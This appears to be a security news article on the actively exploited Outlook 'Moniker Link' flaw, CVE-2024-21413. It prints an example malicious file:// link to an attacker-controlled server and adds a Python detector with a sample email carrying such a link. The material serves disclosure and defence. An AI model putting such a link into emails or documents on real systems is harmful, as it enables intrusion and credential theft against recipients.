Cybersecurity firm Check Point has discovered a critical remote code execution (RCE) vulnerability in Microsoft Outlook, which is currently being exploited in active cyberattacks, posing a significant threat to organizations worldwide.
This has prompted the Cybersecurity and Infrastructure Security Agency (CISA) to warn the U.S. federal agencies to secure their systems against such ongoing attacks.
Check Point vulnerability researcher Haifei Li discovered the high-severity RCE vulnerability tracked as CVE-2024-21413 (CVSS score 9.8).
This flaw results from improper input validation, which can trigger code execution when opening emails with malicious links using a vulnerable Microsoft Outlook version.
Successful exploitation of this vulnerability would allow a threat actor to bypass the Office Protected View and open malicious files in editing mode rather than protected mode.
It could also grant the threat actor elevated privileges, including the ability to read, write, and delete data.
Microsoft addressed the CVE-2024-21413 vulnerability a year ago, cautioning that the Preview Pane could itself be an attack vector.
As a result, simply viewing a malicious email within Outlook might be enough to trigger the exploit, making it exceptionally dangerous.
According to Check Point, attackers exploit the vulnerability, dubbed Moniker Link, using a technique that tricks Outlook into opening unsafe files.
This allows the threat actors to bypass built-in Outlook protections for malicious links embedded in emails using the file:// protocol.
The attackers can manipulate Outlook to treat malicious files as trusted resources by appending an exclamation mark followed by arbitrary text to a file URL.
By inserting this exclamation mark immediately after the file extension in URLs pointing to attacker-controlled servers, along with some random text, they can deceive the system and execute malicious payloads.
For example, an attacker might craft a link as shown below:
<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>
When a victim clicks on the link, Outlook retrieves the file from the attacker’s server and runs it with elevated privileges, granting the attacker control over the system.
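As an added illustration from the defender's side (this is not code from Check Point or Microsoft), the following Python snippet scans an email's HTML body for hyperlinks that match the Moniker Link pattern described above: a file: URL with an exclamation mark appended directly after the file extension. The sample email body, the host 192.0.2.10 and the function names are constructed for this example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Pattern for the Moniker Link form described in the article:
# "<name>.<ext>!<arbitrary text>" at the end of a file: URL path.
MONIKER_LINK_RE = re.compile(r"\.[A-Za-z0-9]{1,8}![^/\\]*$")


class _HrefCollector(HTMLParser):
    """Collect every href attribute of <a> tags in an HTML fragment."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "a":
            for name, value in attrs:
                if name.lower() == "href" and value:
                    self.hrefs.append(value.strip())


def is_moniker_link(href):
    """True if href is a file: URL with '!' appended right after the extension."""
    href = href.strip()
    if not href.lower().startswith("file:"):
        return False
    # Normalise UNC backslashes and URL escapes so that
    # "file:///\\host\share\x.rtf!y" and "file://host/share/x.rtf%21y"
    # are both recognised.
    path = unquote(href.replace("\\", "/"))
    return MONIKER_LINK_RE.search(path) is not None


def find_moniker_links(html):
    """Return every href in html that matches the Moniker Link pattern."""
    collector = _HrefCollector()
    collector.feed(html)
    return [h for h in collector.hrefs if is_moniker_link(h)]


# Constructed sample email body (hypothetical hosts and paths).
SAMPLE_EMAIL_HTML = r"""
<p>Quarterly report attached.</p>
<a href="https://intranet.example.test/report.pdf">Read online</a>
<a href="file:///\\192.0.2.10\share\report.rtf!anything">CLICK ME</a>
<a href="file:///C:/Users/Public/notes.txt">Local notes</a>
"""

if __name__ == "__main__":
    for link in find_moniker_links(SAMPLE_EMAIL_HTML):
        print("Moniker Link pattern found:", link)
```

The check inspects only the form of the link and never fetches or opens the referenced file, so it can run in a mail gateway or SIEM enrichment step.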
The CVE-2024-21413 vulnerability has affected multiple Microsoft Office products, including Microsoft Office LTSC 2021, Microsoft 365 Apps for Enterprise, Microsoft Outlook 2016, and Microsoft Office 2019.
In response to the active exploitation of this vulnerability, CISA has added CVE-2024-21413 to its Known Exploited Vulnerabilities (KEV) Catalog.
As per the November 2021 Binding Operational Directive (BOD) 22-01, federal agencies have until February 27, 2025, to patch their systems and protect their networks against potential threats.
“These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise,” the cybersecurity agency warned on Thursday.
With active exploitation in the wild, CVE-2024-21413 presents a severe security risk to Outlook users.
Hence, private organizations are advised to immediately apply patches and reinforce cybersecurity defenses to prevent potential breaches.